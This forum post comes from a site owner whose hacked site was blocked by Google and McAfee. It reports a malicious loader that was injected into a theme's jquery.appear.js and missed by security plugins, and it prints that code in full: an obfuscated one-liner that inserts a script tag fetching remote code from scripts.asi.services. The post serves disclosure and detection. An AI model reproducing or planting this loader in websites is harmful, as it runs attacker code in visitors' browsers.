Malicious function not detected in any scan

Hello,

A few days ago my site was hacked.

Despite the fact that we did full disinfections, restored backup files several times, and added strong security systems plus CDNs, Google Search Console and McAfee blocked us from the site, for being malicious, for a long time.

After requesting several revisions without success, we found the problem.

A function added to the head of a theme’s .js file, which uses a “Get” call and links to an encrypted external link.

It is only shown when loading certain pages in the browser code inside (it is not always shown…)

This code is invisible to the user and to monitoring systems such as Wordfence, iThemes S, AIO S, and Anti-Malware Security and Brute-Force Firewall. None have detected it.

This is why we are advising every plugin we have named (and used) to review that malicious code and add it somehow to their scan lists.

Apparently it is relatively new and little used, there are very few references in google(https://www.google.com/search?q=cX458IXVf9TcXk%2FnhNa%2By0nWDAAY7JxpQFgRZT9%2FnUk%3D&newwindow=1&rlz=1C1UUXU_esAR993AR993&sxsrf=APwXEden26t fFRvJGkav31Fi7ZMfrTUvk)

Copy of the code found in the head of the file: “jquery.appear.js“

;(function(r,f,u,o,h,s){h=f.createElement(u);s=f.getElementsByTagName(u)[0];h.async=1;h.src=o; s.parentNode.insertBefore(h,s);})(window,document,'script','https://scripts.asi.services/cX458IXVf9TcXk/nhNa+y0nWDAAY7JxpQFgRZT9/nUk=');

I hope it works for you. Any questions ask me.

Greetings.